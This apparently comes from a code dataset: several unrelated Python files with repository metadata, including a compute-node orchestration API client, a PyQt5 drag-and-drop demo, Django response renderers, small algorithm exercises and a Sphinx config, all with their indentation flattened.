:param net_uuid: uuid of the network you want to remove
:param node_uuid: optional node from which remove the network element
:return: boolean
'''
if node_uuid is not None:
uri = '{}/{}/network/*/networks/{}'.format(self.store.droot, node_uuid, net_uuid)
else:
uri = '{}/*/network/*/networks/{}'.format(self.store.droot, net_uuid)
res = self.store.desired.remove(uri)
if res:
return True
else:
return False
def list(self, node_uuid=None):
'''
List all network element available in the system/teneant or in a specified node
:param node_uuid: optional node uuid
:return: dictionary {node uuid: network element list}
'''
if node_uuid is not None:
n_list = []
uri = '{}/{}/network/*/networks/'.format(self.store.aroot, node_uuid)
response = self.store.actual.resolveAll(uri)
for i in response:
n_list.append(json.loads(i[1]))
return {node_uuid: n_list}
nets = {}
uri = '{}/*/network/*/networks/'.format(self.store.aroot)
response = self.store.actual.resolveAll(uri)
for i in response:
id = i[0].split('/')[2]
net = json.loads(i[1])
net_list = nets.get(id, None)
if net_list is None:
net_list = []
net_list.append(net)
nets.update({id: net_list})
return nets
def search(self, search_dict, node_uuid=None):
'''
Will search for a network element matching the dictionary in a single node or in all nodes
:param search_dict: dictionary contains all information to match
:param node_uuid: optional node uuid in which search
:return: a dictionary with {node_uuid, network element uuid list} with matches
'''
pass
class Entity(object):
'''
This class encapsulates the api for interaction with entities
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def __search_plugin_by_name(self, name, node_uuid):
uri = '{}/{}/plugins'.format(self.store.aroot, node_uuid)
all_plugins = self.store.actual.get(uri)
if all_plugins is None or all_plugins == '':
print('Cannot get plugin')
return None
all_plugins = json.loads(all_plugins).get('plugins')
search = [x for x in all_plugins if name.upper() in x.get('name').upper()]
if len(search) == 0:
return None
else:
print("handler {}".format(search))
return search[0]
def __get_entity_handler_by_uuid(self, node_uuid, entity_uuid):
uri = '{}/{}/runtime/*/entity/{}'.format(self.store.aroot, node_uuid, entity_uuid)
all = self.store.actual.resolveAll(uri)
for i in all:
k = i[0]
if fnmatch.fnmatch(k, uri):
# print('MATCH {0}'.format(k))
# print('Extracting uuid...')
regex = uri.replace('/', '\/')
regex = regex.replace('*', '(.*)')
reobj = re.compile(regex)
mobj = reobj.match(k)
uuid = mobj.group(1)
# print('UUID {0}'.format(uuid))
print("handler {}".format(uuid))
return uuid
def __get_entity_handler_by_type(self, node_uuid, t):
handler = None
handler = self.__search_plugin_by_name(t, node_uuid)
if handler is None:
print('type not yet supported')
print("handler {}".format(handler))
return handler
def __wait_atomic_entity_state_change(self, node_uuid, handler_uuid, entity_uuid, state):
while True:
time.sleep(1)
uri = '{}/{}/runtime/{}/entity/{}'.format(self.store.aroot, node_uuid, handler_uuid, entity_uuid)
data = self.store.actual.get(uri)
if data is not None:
entity_info = json.loads(data)
if entity_info is not None and entity_info.get('status') == state:
return
def __wait_atomic_entity_instance_state_change(self, node_uuid, handler_uuid, entity_uuid, instance_uuid, state):
while True:
time.sleep(1)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}'.format(self.store.aroot, node_uuid, handler_uuid, entity_uuid, instance_uuid)
data = self.store.actual.get(uri)
if data is not None:
entity_info = json.loads(data)
if entity_info is not None and entity_info.get('status') == state:
return
def add(self, manifest, node_uuid=None, wait=False):
'''
define, configure and run an entity all in one shot
:param manifest: manifest rapresenting the entity
:param node_uuid: optional uuid of the node in which the entity will be added
:param wait: flag for wait that everything is started before returing
:return: the instance uuid
'''
pass
def remove(self, entity_uuid, node_uuid=None, wait=False):
'''
stop, clean and undefine entity all in one shot
:param entity_uuid:
:param node_uuid:
:param wait:
:return: the instance uuid
'''
pass
def define(self, manifest, node_uuid, wait=False):
'''
Defines an atomic entity in a node, this method will check the manifest before sending the definition to the node
:param manifest: dictionary representing the atomic entity manifest
:param node_uuid: destination node uuid
:param wait: if wait that the definition is complete before returning
:return: boolean
'''
manifest.update({'status': 'define'})
handler = None
t = manifest.get('type')
try:
if t in ['kvm', 'xen']:
handler = self.__search_plugin_by_name(t, node_uuid)
validate(manifest.get('entity_data'), Schemas.vm_schema)
elif t in ['container', 'lxd']:
handler = self.__search_plugin_by_name(t, node_uuid)
validate(manifest.get('entity_data'), Schemas.container_schema)
elif t == 'native':
handler = self.__search_plugin_by_name('native', node_uuid)
validate(manifest.get('entity_data'), Schemas.native_schema)
elif t == 'ros2':
handler = self.__search_plugin_by_name('ros2', node_uuid)
validate(manifest.get('entity_data'), Schemas.ros2_schema)
elif t == 'usvc':
print('microservice not yet')
else:
print('type not recognized')
if handler is None:
return False
except ValidationError as ve:
print("Error in manifest {}".format(ve))
return False
entity_uuid = manifest.get('uuid')
entity_definition = manifest
json_data = json.dumps(entity_definition).replace(' ', '')
uri = '{}/{}/runtime/{}/entity/{}'.format(self.store.droot, node_uuid, handler.get('uuid'), entity_uuid)
res = self.store.desired.put(uri, json_data)
if res:
if wait:
self.__wait_atomic_entity_state_change(node_uuid,handler.get('uuid'), entity_uuid, 'defined')
return True
else:
return False
def undefine(self, entity_uuid, node_uuid, wait=False):
'''
This method undefine an atomic entity in a node
:param entity_uuid: atomic entity you want to undefine
:param node_uuid: destination node
:param wait: if wait before returning that the entity is undefined
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}'.format(self.store.droot, node_uuid, handler, entity_uuid)
res = self.store.desired.remove(uri)
if res:
return True
else:
return False
def configure(self, entity_uuid, node_uuid, instance_uuid=None, wait=False):
'''
Configure an atomic entity, creation of the instance
:param entity_uuid: entity you want to configure
:param node_uuid: destination node
:param instance_uuid: optional if preset will use that uuid for the atomic entity instance otherwise will generate a new one
:param wait: optional wait before returning
:return: intstance uuid or none in case of error
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
if instance_uuid is None:
instance_uuid = '{}'.format(uuid.uuid4())
uri = '{}/{}/runtime/{}/entity/{}/instance/{}#status=configure'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.dput(uri)
if res:
if wait:
self.__wait_atomic_entity_instance_state_change(node_uuid, handler, entity_uuid, instance_uuid, 'configured')
return instance_uuid
else:
return None
def clean(self, entity_uuid, node_uuid, instance_uuid, wait=False):
'''
Clean an atomic entity instance, this will destroy the instance
:param entity_uuid: entity for which you want to clean an instance
:param node_uuid: destionation node
:param instance_uuid: instance you want to clean
:param wait: optional wait before returning
:return: boolean
'''
handler = yield from self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}'.format(self.store.aroot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.remove(uri)
if res:
return True
else:
return False
def run(self, entity_uuid, node_uuid, instance_uuid, wait=False):
'''
Starting and atomic entity instance
:param entity_uuid: entity for which you want to run the instance
:param node_uuid: destination node
:param instance_uuid: instance you want to start
:param wait: optional wait before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}#status=run'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.dput(uri)
if res:
if wait:
self.__wait_atomic_entity_instance_state_change(node_uuid, handler, entity_uuid, instance_uuid, 'run')
return True
else:
return False
def stop(self, entity_uuid, node_uuid, instance_uuid, wait=False):
'''
Shutting down an atomic entity instance
:param entity_uuid: entity for which you want to shutdown the instance
:param node_uuid: destination node
:param instance_uuid: instance you want to shutdown
:param wait: optional wait before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}#status=stop'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.dput(uri)
if res:
if wait:
self.__wait_atomic_entity_instance_state_change(node_uuid, handler, entity_uuid, instance_uuid, 'stop')
return True
else:
return False
def pause(self, entity_uuid, node_uuid, instance_uuid, wait=False):
'''
Pause the exectution of an atomic entity instance
:param entity_uuid: entity for which you want to pause the instance
:param node_uuid: destination node
:param instance_uuid: instance you want to pause
:param wait: optional wait before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}#status=pause'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.dput(uri)
if res:
if wait:
self.__wait_atomic_entity_instance_state_change(node_uuid, handler, entity_uuid, instance_uuid, 'pause')
return True
else:
return False
def resume(self, entity_uuid, node_uuid, instance_uuid, wait=False):
'''
resume the exectution of an atomic entity instance
:param entity_uuid: entity for which you want to resume the instance
:param node_uuid: destination node
:param instance_uuid: instance you want to resume
:param wait: optional wait before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}#status=resume'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res = self.store.desired.dput(uri)
if res:
if wait:
self.__wait_atomic_entity_instance_state_change(node_uuid, handler, entity_uuid, instance_uuid, 'run')
return True
else:
return False
def migrate(self, entity_uuid, instance_uuid, node_uuid, destination_node_uuid, wait=False):
'''
Live migrate an atomic entity instance between two nodes
The migration is issued when this command is sended, there is a little overhead for the copy of the base image and the disk image
:param entity_uuid: ntity for which you want to migrate the instance
:param instance_uuid: instance you want to migrate
:param node_uuid: source node for the instance
:param destination_node_uuid: destination node for the instance
:param wait: optional wait before returning
:return: boolean
'''
handler = self.__get_entity_handler_by_uuid(node_uuid, entity_uuid)
uri = '{}/{}/runtime/{}/entity/{}/instance/{}'.format(self.store.aroot, node_uuid, handler, entity_uuid, instance_uuid)
entity_info = self.store.actual.get(uri)
if entity_info is None:
return False
entity_info = json.loads(entity_info)
entity_info_src = entity_info.copy()
entity_info_dst = entity_info.copy()
entity_info_src.update({"status": "taking_off"})
entity_info_src.update({"dst": destination_node_uuid})
entity_info_dst.update({"status": "landing"})
entity_info_dst.update({"dst": destination_node_uuid})
destination_handler = self.__get_entity_handler_by_type(destination_node_uuid, entity_info_dst.get('type'))
if destination_handler is None:
return False
uri = '{}/{}/runtime/{}/entity/{}/instance/{}'.format(self.store.droot, destination_node_uuid, destination_handler.get('uuid'), entity_uuid, instance_uuid)
res = self.store.desired.put(uri, json.dumps(entity_info_dst).replace(' ', ''))
if res:
uri = '{}/{}/runtime/{}/entity/{}/instance/{}'.format(self.store.droot, node_uuid, handler, entity_uuid, instance_uuid)
res_dest = yield from self.store.desired.dput(uri, json.dumps(entity_info_src).replace(' ', ''))
if res_dest:
if wait:
self.__wait_atomic_entity_instance_state_change(destination_node_uuid, destination_handler.get('uuid'), entity_uuid, instance_uuid, 'run')
return True
else:
print("Error on destination node")
return False
else:
print("Error on source node")
return False
def search(self, search_dict, node_uuid=None):
pass
class Image(object):
'''
This class encapsulates the action on images
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def add(self, manifest, node_uuid=None):
'''
Adding an image to a node or to all nodes
:param manifest: dictionary representing the manifest for the image
:param node_uuid: optional node in which add the image
:return: boolean
'''
manifest.update({'status': 'add'})
json_data = json.dumps(manifest).replace(' ', '')
if node_uuid is None:
uri = '{}/*/runtime/*/image/{}'.format(self.store.droot, manifest.get('uuid'))
else:
uri = '{}/{}/runtime/*/image/{}'.format(self.store.droot, node_uuid, manifest.get('uuid'))
res = self.store.desired.put(uri, json_data)
if res:
return True
else:
return False
def remove(self, image_uuid, node_uuid=None):
'''
remove an image for a node or all nodes
:param image_uuid: image you want to remove
:param node_uuid: optional node from which remove the image
:return: boolean
'''
if node_uuid is None:
uri = '{}/*/runtime/*/image/{}'.format(self.store.droot, image_uuid)
else:
uri = '{}/{}/runtime/*/image/{}'.format(self.store.droot, node_uuid, image_uuid)
res = self.store.desired.remove(uri)
if res:
return True
else:
return False
def search(self, search_dict, node_uuid=None):
pass
class Flavor(object):
'''
This class encapsulates the action on flavors
'''
def __init__(self, store=None):
if store is None:
raise RuntimeError('store cannot be none in API!')
self.store = store
def add(self, manifest, node_uuid=None):
'''
Add a computing flavor to a node or all nodes
:param manifest: dictionary representing the manifest for the flavor
:param node_uuid: optional node in which add the flavor
:return: boolean
'''
manifest.update({'status': 'add'})
json_data = json.dumps(manifest).replace(' ', '')
if node_uuid is None:
uri = '{}/*/runtime/*/flavor/{}'.format(self.store.droot, manifest.get('uuid'))
else:
uri = '{}/{}/runtime/*/flavor/{}'.format(self.store.droot, node_uuid, manifest.get('uuid'))
res = self.store.desired.put(uri, json_data)
if res:
return True
else:
return False
def remove(self, flavor_uuid, node_uuid=None):
'''
Remove a flavor from all nodes or a specified node
:param flavor_uuid: flavor to remove
:param node_uuid: optional node from which remove the flavor
:return: boolean
'''
if node_uuid is None:
uri = '{}/*/runtime/*/flavor/{}'.format(self.store.droot, flavor_uuid)
else:
uri = '{}/{}/runtime/*/flavor/{}'.format(self.store.droot, node_uuid, flavor_uuid)
res = self.store.desired.remove(uri)
if res:
return True
else:
return False
def search(self, search_dict, node_uuid=None):
pass
def list(self, node_uuid=None):
'''
List all network element available in the system/teneant or in a specified node
:param node_uuid: optional node uuid
:return: dictionary {node uuid: network element list}
'''
if node_uuid is not None:
f_list = []
uri = '{}/{}/runtime/*/flavor/'.format(self.store.aroot, node_uuid)
response = self.store.actual.resolveAll(uri)
for i in response:
f_list.append(json.loads(i[1]))
return {node_uuid: f_list}
flavs = {}
uri = '{}/*/runtime/*/flavor/'.format(self.store.aroot)
response = self.store.actual.resolveAll(uri)
for i in response:
id = i[0].split('/')[2]
net = json.loads(i[1])
flavs_list = flavs.get(id, None)
if flavs_list is None:
flavs_list = []
flavs_list.append(net)
flavs.update({id: flavs_list})
return flavs
'''
Methods
- manifest
-check
- node
- list
- info
- plugins
- search
- plugin
- add
- remove
- info
- list
- search
- network
- add
- remove
- list
- search
- entity
- add
- remove
- define
- undefine
- configure
- clean
- run
- stop
- pause
- resume
- migrate
- search
- images
- add
- remove
- search
- flavor
- add
- remove
- search
'''
| [
"[email protected]"
]
| |
67269e55398033362ab23e10f0576fc5aeae98ab | 2e1b5bd2d33f0beb965be77f1de2ae035c491125 | /chapter4/qt04_drag.py | f30b52e75694194da80bf8c948af65dfb20391a1 | []
| no_license | mandeling/PyQt5-1 | 1cf6778e767e5746640aa0458434751a226a2383 | 9334786e70b2657e0f94b6dad4714f2aa239d0cd | refs/heads/master | 2020-05-07T19:08:40.072960 | 2019-04-11T10:44:48 | 2019-04-11T10:44:48 | 180,799,901 | 1 | 0 | null | 2019-04-11T13:37:55 | 2019-04-11T13:37:55 | null | UTF-8 | Python | false | false | 887 | py | import sys
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
class Combo(QComboBox):
def __init__(self, title, parent):
super(Combo, self).__init__(parent)
self.setAcceptDrops(True)
def dragEnterEvent(self, e):
print(e)
if e.mimeData().hasText():
e.accept()
else:
e.ignore()
def dropEvent(self, e):
self.addItem(e.mimeData().text())
class Example(QWidget):
def __init__(self):
super(Example, self).__init__()
self.initUI()
def initUI(self):
lo = QFormLayout()
lo.addRow(QLabel('请把左边的文本拖曳到右边的下拉菜单中'))
edit = QLineEdit()
edit.setDragEnabled(True)
com = Combo('Button', self)
lo.addRow(edit, com)
self.setLayout(lo)
self.setWindowTitle('简单的拖曳例子')
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
ex.show()
sys.exit(app.exec())
| [
"[email protected]"
]
| |
c33c5d21ce909bc806b78c0dde5a40c39d15fbd5 | 00d7e9321d418a2d9a607fb9376b862119f2bd4e | /utils/pdf_figure_stamper.py | 4628dbee41fd552c97249ac0bbeb5cd6de0b08e4 | [
"MIT"
]
| permissive | baluneboy/pims | 92b9b1f64ed658867186e44b92526867696e1923 | 5a07e02588b1b7c8ebf7458b10e81b8ecf84ad13 | refs/heads/master | 2021-11-16T01:55:39.223910 | 2021-08-13T15:19:48 | 2021-08-13T15:19:48 | 33,029,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,335 | py | #!/usr/bin/env python
import os
from pims.files.pdfs.pdfjam import CpdfAddTextCommand
from pims.files.utils import listdir_filename_pattern
# return list of PDF files matching filename pattern criteria (not having STAMPED in filename)
def get_pdf_files(dirpath, fname_pat):
"""return list of PDF files for this drop number (i.e. drop dir)"""
tmp_list = listdir_filename_pattern(dirpath, fname_pat)
# filter tmp_list to ignore previous run's _cpdf_ filenames
return [ x for x in tmp_list if "STAMPED" not in x ]
if __name__ == "__main__":
# get list of analysis template plot PDFs
sensor = '121f02'
sensor_suffix = '010'
fname_pat = '.*' + sensor + sensor_suffix + '_gvtm_pops_.*_EML_analysis.pdf'
dirpath = '/home/pims/dev/matlab/programs/special/EML/hb_vib_crew_Vehicle_and_Crew_Activity/plots'
pdf_files = sorted(get_pdf_files(dirpath, fname_pat))
c = 0
for f in pdf_files:
c += 1
print 'page %02d %s' % (c, f)
#cpdf -prerotate -add-text "${F}" ${F} -color "0.5 0.3 0.4" -font-size 6 -font "Courier" -pos-left "450 5" -o ${F/.pdf/_cpdf_add-text.pdf}
color = "0.5 0.3 0.4"
font = "Courier"
font_size = 6
pos_left = "450 5"
cat = CpdfAddTextCommand(f, color, font, font_size, pos_left)
cat.run()
| [
"[email protected]"
]
| |
116c66d9f3c1b4f5e2c4991742de3a8413bbff56 | 854b220c25dc886f77c237437c370782a68c8bb2 | /proyectos_de_ley/api/api_responses.py | f94452466a9934b2e9df3b1b8c8aaa98a4e6592c | [
"MIT"
]
| permissive | MrBaatezu/proyectos_de_ley | b6bb672b5bcc3c8ca2b6327ee96083466356560d | 56cf6f2f1df6483d2057235132a376b068877407 | refs/heads/master | 2021-01-18T01:10:12.683082 | 2015-10-29T00:44:52 | 2015-10-29T00:44:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 975 | py | from django.http import HttpResponse
from rest_framework.renderers import JSONRenderer
from rest_framework_csv import renderers
class JSONResponse(HttpResponse):
"""
An HttpResponse that renders its content into JSON.
"""
def __init__(self, data, **kwargs):
content = JSONRenderer().render(data)
kwargs['content_type'] = 'application/json'
super(JSONResponse, self).__init__(content, **kwargs)
class CSVResponse(HttpResponse):
"""
An HttpResponse that renders its content into CSV.
"""
def __init__(self, data, **kwargs):
content = CSVRenderer().render(data)
kwargs['content_type'] = 'text/csv'
super(CSVResponse, self).__init__(content, **kwargs)
class CSVRenderer(renderers.CSVRenderer):
media_type = 'text/csv'
format = 'csv'
def render(self, data, media_type=None, renderer_context=None):
return super(CSVRenderer, self).render(data, media_type, renderer_context)
| [
"[email protected]"
]
| |
8c2611ad5852420460e9005177ed6e1296572354 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/0/a01.py | d912fcfad8c297d61001f2e370b33ba78e5a3e2d | []
| no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'a01':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
]
| |
efecd6e8598ad283a82bc7fe6aab0b6dec4ceea3 | 5c333d9afed7ecf1feba34c41764184b70f725ea | /scripts/test.py | 22d789f0c247add83cb748c9a559e96f2bcd14b5 | []
| no_license | NMGRL/pychrondata | 4e3573f929b6a465fa959bfe5b5bdfe734514b8c | 0d805ca6b7e5377f253d80ad93749b1d4253cb50 | refs/heads/master | 2020-12-24T16:35:39.308745 | 2016-03-09T18:37:47 | 2016-03-09T18:37:47 | 15,424,677 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 344 | py | #!Extraction
def main():
'''
start at 0 zoom
focus
take picture
increment zoom
take picture
start at 100 zoom
focus
take picture....
'''
for i in range(10):
info('info {}'.format(i))
| [
"[email protected]"
]
| |
16d51e454824f67b4b41ef3ca55f13c9e221bf28 | 81fe7f2faea91785ee13cb0297ef9228d832be93 | /HackerRank/ajob_subsequence_bis.py | 71a54d19dcac4f7ce8161b46f701309c0454498c | []
| no_license | blegloannec/CodeProblems | 92349c36e1a35cfc1c48206943d9c2686ea526f8 | 77fd0fa1f1a519d4d55265b9a7abf12f1bd7d19e | refs/heads/master | 2022-05-16T20:20:40.578760 | 2021-12-30T11:10:25 | 2022-04-22T08:11:07 | 54,330,243 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | #!/usr/bin/env python3
# cf ajob_subsequence.py
# Method 2: using Lucas's theorem
def digits(n):
D = []
while n:
n,d = divmod(n,P)
D.append(d)
return D
def inv(n):
return pow(n,P-2,P)
def binom(n,p):
if 0<=p<=n:
return (Fact[n] * inv((Fact[p]*Fact[n-p])%P)) % P
return 0
def binom_lucas(n,k):
assert 0<=k<=n
Dn = digits(n)
Dk = digits(k)
while len(Dk)<len(Dn):
Dk.append(0)
res = 1
for ni,ki in zip(Dn,Dk):
res = (res * binom(ni,ki)) % P
return res
if __name__=='__main__':
T = int(input())
for _ in range(T):
N,K,P = map(int,input().split())
Fact = [1]*P
for i in range(2,P):
Fact[i] = (Fact[i-1]*i) % P
print(binom_lucas(N+1,K+1))
| [
"[email protected]"
]
| |
1eb2f715857b7860d37606c858a8ac2c834a2f58 | 87fb0ae5563512bf4cfe2754ea92e7f4173f753f | /Chap_08/Ex_181.py | ba2d1b32e7dabdca85b694f6e4635d4a64b0e168 | []
| no_license | effedib/the-python-workbook-2 | 87291f5dd6d369360288761c87dc47df1b201aa7 | 69532770e6bbb50ea507e15f7d717028acc86a40 | refs/heads/main | 2023-08-21T13:43:59.922037 | 2021-10-12T20:36:41 | 2021-10-12T20:36:41 | 325,384,405 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,247 | py | # Possible Change
# Read both the dollar amount and the number of coins from user and display a message indicating whether or not the
# entered amount can be formed using the number of coins indicated.
def possibleChange(dollars, coins, index=0):
coins_list = [0.25, 0.10, 0.05, 0.01]
dollars = round(dollars, 2)
if dollars == 0 and coins == 0:
return True
elif index >= len(coins_list):
return False
print("index '{:.2f}'\t{:.2f} dollars\t{:.2f} coins".format(coins_list[index], dollars, coins))
if dollars == 0 or coins == 0:
dollars += coins_list[index]
coins += 1
index += 1
return possibleChange(dollars, coins, index)
elif (dollars / coins) in coins_list:
return True
else:
if dollars >= coins_list[index]:
dollars -= coins_list[index]
coins -= 1
else:
index += 1
return possibleChange(dollars, coins, index)
def main():
total = float(input('Enter the total amount: '))
coin = int(input('How many coins do you want to use? '))
for i in range(1, (coin+1)):
print("{} coins:\t{}".format(coin, possibleChange(total, coin)))
if __name__ == "__main__":
main()
| [
"[email protected]"
]
| |
a9cd81676f816e00ef69cf3442787107109adc24 | 7834e7a48399b156401ea62c0c6d2de80ad421f5 | /docs/sphinx/conf.py | 6a6e8b3e6216ce0aa57a8b196300a395552f700e | [
"MIT"
]
| permissive | vojnovski/pysparkling | b9758942aba0d068f6c51797c8fb491cf59c3401 | 21b36464371f121dc7963dac09d300e7235f587e | refs/heads/master | 2020-04-08T18:33:55.707209 | 2016-07-27T15:12:59 | 2016-07-27T15:12:59 | 62,555,929 | 0 | 0 | null | 2016-07-04T11:06:18 | 2016-07-04T11:06:18 | null | UTF-8 | Python | false | false | 10,067 | py | # -*- coding: utf-8 -*-
#
# pysparkling documentation build configuration file, created by
# sphinx-quickstart on Sun Jun 7 12:37:20 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
import sphinx_rtd_theme
# extract version from __init__.py
pysparkling_init_filename = os.path.join(
os.path.dirname(__file__),
'..',
'..',
'pysparkling',
'__init__.py',
)
with open(pysparkling_init_filename, 'r') as f:
version_line = [l for l in f if l.startswith('__version__')][0]
PYSPARKLING_VERSION = version_line.split('=')[1].strip()[1:-1]
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pysparkling'
copyright = u'2015-2016, a project started by Sven Kreiss'
author = u'Sven Kreiss'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = PYSPARKLING_VERSION
# The full version, including alpha/beta/rc tags.
release = PYSPARKLING_VERSION
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = 'images/logo-w600.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = 'images/favicon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = False
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = False
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'pysparklingdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
